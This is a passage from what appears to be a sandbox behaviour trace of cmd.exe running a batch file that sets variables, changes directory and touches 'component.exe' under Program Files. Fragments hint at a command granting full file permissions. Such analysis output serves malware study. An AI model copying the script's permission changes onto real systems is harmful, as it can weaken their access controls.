dwFlags=0x0, lpMem=0x664a28 | out: hHeap=0x650000) returned 1 [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6648f8 | out: hHeap=0x650000) returned 1 [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6647d0 | out: hHeap=0x650000) returned 1 [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664760 | out: hHeap=0x650000) returned 1 [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6646d0 | out: hHeap=0x650000) returned 1 [0208.342] GetProcessHeap () returned 0x650000 [0208.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6644b8 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664438 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664308 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6641e0 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664170 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x672c20 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650ab8 | out: hHeap=0x650000) returned 1 [0208.343] GetProcessHeap () returned 0x650000 [0208.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x651230 | out: hHeap=0x650000) returned 1 [0208.343] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.343] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0208.343] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2eefc0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2eefc0*=0xb3, lpOverlapped=0x0) returned 1 [0208.344] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0208.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0208.345] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.345] GetFileType (hFile=0x78) returned 0x1 [0208.345] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.345] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0208.345] GetProcessHeap () returned 0x650000 [0208.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x674b08 [0208.346] GetProcessHeap () returned 0x650000 [0208.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x68) returned 0x651230 [0208.346] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\component.exe", nBufferLength=0x208, lpBuffer=0x2ee750, lpFilePart=0x2ee748 | out: lpBuffer="C:\\Program Files\\Windows Journal\\component.exe", lpFilePart=0x2ee748*="component.exe") returned 0x2e [0208.347] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x664170 [0208.347] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.347] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0208.347] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x664170 [0208.347] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.347] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0208.347] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\component.exe", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb11ba90, ftCreationTime.dwHighDateTime=0x1d5b797, ftLastAccessTime.dwLowDateTime=0x8f5271f0, ftLastAccessTime.dwHighDateTime=0x1d576b9, ftLastWriteTime.dwLowDateTime=0x8f5271f0, ftLastWriteTime.dwHighDateTime=0x1d576b9, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="component.exe", cAlternateFileName="COMPON~1.EXE")) returned 0x664170 [0208.348] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.348] _wcsnicmp (_String1="COMPON~1.EXE", _String2="component.exe", _MaxCount=0xd) returned 25 [0208.348] GetProcessHeap () returned 0x650000 [0208.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x65f4c8 [0208.348] GetProcessHeap () returned 0x650000 [0208.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674b08 | out: hHeap=0x650000) returned 1 [0208.350] _tell (_FileHandle=3) returned 63 [0208.351] _close (_FileHandle=3) returned 0 [0208.351] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eed94 | out: _Buffer="\r\n") returned 2 [0208.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.351] GetFileType (hFile=0x7) returned 0x2 [0208.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed54 | out: lpMode=0x2eed54) returned 1 [0208.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.352] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eed80, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eed80*=0x2) returned 1 [0208.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0208.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0208.356] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eed90 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0208.356] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eed90 | out: _Buffer=">") returned 1 [0208.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.356] GetFileType (hFile=0x7) returned 0x2 [0208.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.356] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed58 | out: lpMode=0x2eed58) returned 1 [0208.357] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.357] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eed84, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eed84*=0x26) returned 1 [0208.357] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.357] GetFileType (hFile=0x7) returned 0x2 [0208.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefdc | out: lpMode=0x2eefdc) returned 1 [0208.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.358] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x650dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef008, lpReserved=0x0 | out: lpBuffer=0x650dc0*, lpNumberOfCharsWritten=0x2ef008*=0x3) returned 1 [0208.359] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef014 | out: _Buffer=" FN=\"component.exe\" ") returned 20 [0208.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.359] GetFileType (hFile=0x7) returned 0x2 [0208.359] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.359] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0208.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.360] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x14) returned 1 [0208.360] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef034 | out: _Buffer="\r\n") returned 2 [0208.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.360] GetFileType (hFile=0x7) returned 0x2 [0208.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.360] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eeff4 | out: lpMode=0x2eeff4) returned 1 [0208.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.361] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef020*=0x2) returned 1 [0208.362] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0208.363] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0208.363] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0208.363] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0208.363] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0208.363] _wcsicmp (_String1="set", _String2="CD") returned 16 [0208.363] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0208.363] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0208.363] _wcsicmp (_String1="set", _String2="REN") returned 1 [0208.363] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0208.363] _wcsicmp (_String1="set", _String2="SET") returned 0 [0208.363] GetConsoleTitleW (in: lpConsoleTitle=0x2eeba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.364] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0208.364] SetEnvironmentVariableW (lpName="FN", lpValue="\"component.exe\"") returned 1 [0208.364] GetProcessHeap () returned 0x650000 [0208.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668178 | out: hHeap=0x650000) returned 1 [0208.364] GetEnvironmentStringsW () returned 0x666b20* [0208.364] GetProcessHeap () returned 0x650000 [0208.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb82) returned 0x6676b0 [0208.365] FreeEnvironmentStringsW (penv=0x666b20) returned 1 [0208.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.365] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.365] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0208.365] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.366] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0208.366] SetConsoleInputExeNameW () returned 0x1 [0208.366] GetConsoleOutputCP () returned 0x1b5 [0208.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0208.366] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eefdc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0208.367] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0208.368] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.368] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664240 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664208 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6641d0 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x650db8 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664170 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x65f4c8 | out: hHeap=0x650000) returned 1 [0208.368] GetProcessHeap () returned 0x650000 [0208.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x651230 | out: hHeap=0x650000) returned 1 [0208.369] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.369] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0208.369] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2eefc0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2eefc0*=0xa3, lpOverlapped=0x0) returned 1 [0208.369] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0208.369] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0208.369] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.369] GetFileType (hFile=0x78) returned 0x1 [0208.369] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.369] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0208.369] GetProcessHeap () returned 0x650000 [0208.370] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x674b08 [0208.370] GetProcessHeap () returned 0x650000 [0208.370] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x70) returned 0x651230 [0208.370] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x2ee750, lpFilePart=0x2ee748 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2ee748*="Ch81ANBE.bat") returned 0x32 [0208.370] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x664170 [0208.370] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x664170 [0208.371] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.371] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0208.371] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x664170 [0208.371] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.371] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x2ee464 | out: lpFindFileData=0x2ee464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x664170 [0208.371] FindClose (in: hFindFile=0x664170 | out: hFindFile=0x664170) returned 1 [0208.371] GetProcessHeap () returned 0x650000 [0208.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x56) returned 0x664170 [0208.371] GetProcessHeap () returned 0x650000 [0208.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674b08 | out: hHeap=0x650000) returned 1 [0208.374] _tell (_FileHandle=3) returned 78 [0208.374] _close (_FileHandle=3) returned 0 [0208.374] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eed94 | out: _Buffer="\r\n") returned 2 [0208.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.374] GetFileType (hFile=0x7) returned 0x2 [0208.375] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed54 | out: lpMode=0x2eed54) returned 1 [0208.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.375] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eed80, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eed80*=0x2) returned 1 [0208.377] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0208.377] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0208.377] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eed90 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0208.378] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eed90 | out: _Buffer=">") returned 1 [0208.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.378] GetFileType (hFile=0x7) returned 0x2 [0208.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.378] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed58 | out: lpMode=0x2eed58) returned 1 [0208.379] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eed84, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eed84*=0x26) returned 1 [0208.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.380] GetFileType (hFile=0x7) returned 0x2 [0208.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.380] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefdc | out: lpMode=0x2eefdc) returned 1 [0208.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x650dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef008, lpReserved=0x0 | out: lpBuffer=0x650dc0*, lpNumberOfCharsWritten=0x2ef008*=0x2) returned 1 [0208.381] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef014 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0208.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.381] GetFileType (hFile=0x7) returned 0x2 [0208.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0208.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.382] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x2d) returned 1 [0208.386] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef034 | out: _Buffer="\r\n") returned 2 [0208.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.386] GetFileType (hFile=0x7) returned 0x2 [0208.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eeff4 | out: lpMode=0x2eeff4) returned 1 [0208.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef020*=0x2) returned 1 [0208.389] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0208.389] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0208.389] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0208.389] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0208.389] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0208.389] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0208.389] GetConsoleTitleW (in: lpConsoleTitle=0x2eeba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.390] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ee960, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ee958, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ee958*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0208.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x2ee6fc, lpFilePart=0x2ee6f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x2ee6f8*=0x0) returned 0x26 [0208.392] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0208.392] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ee478 | out: lpFindFileData=0x2ee478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6644b0 [0208.392] FindClose (in: hFindFile=0x6644b0 | out: hFindFile=0x6644b0) returned 1 [0208.392] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ee478 | out: lpFindFileData=0x2ee478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6644b0 [0208.393] FindClose (in: hFindFile=0x6644b0 | out: hFindFile=0x6644b0) returned 1 [0208.393] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0208.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ee478 | out: lpFindFileData=0x2ee478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, 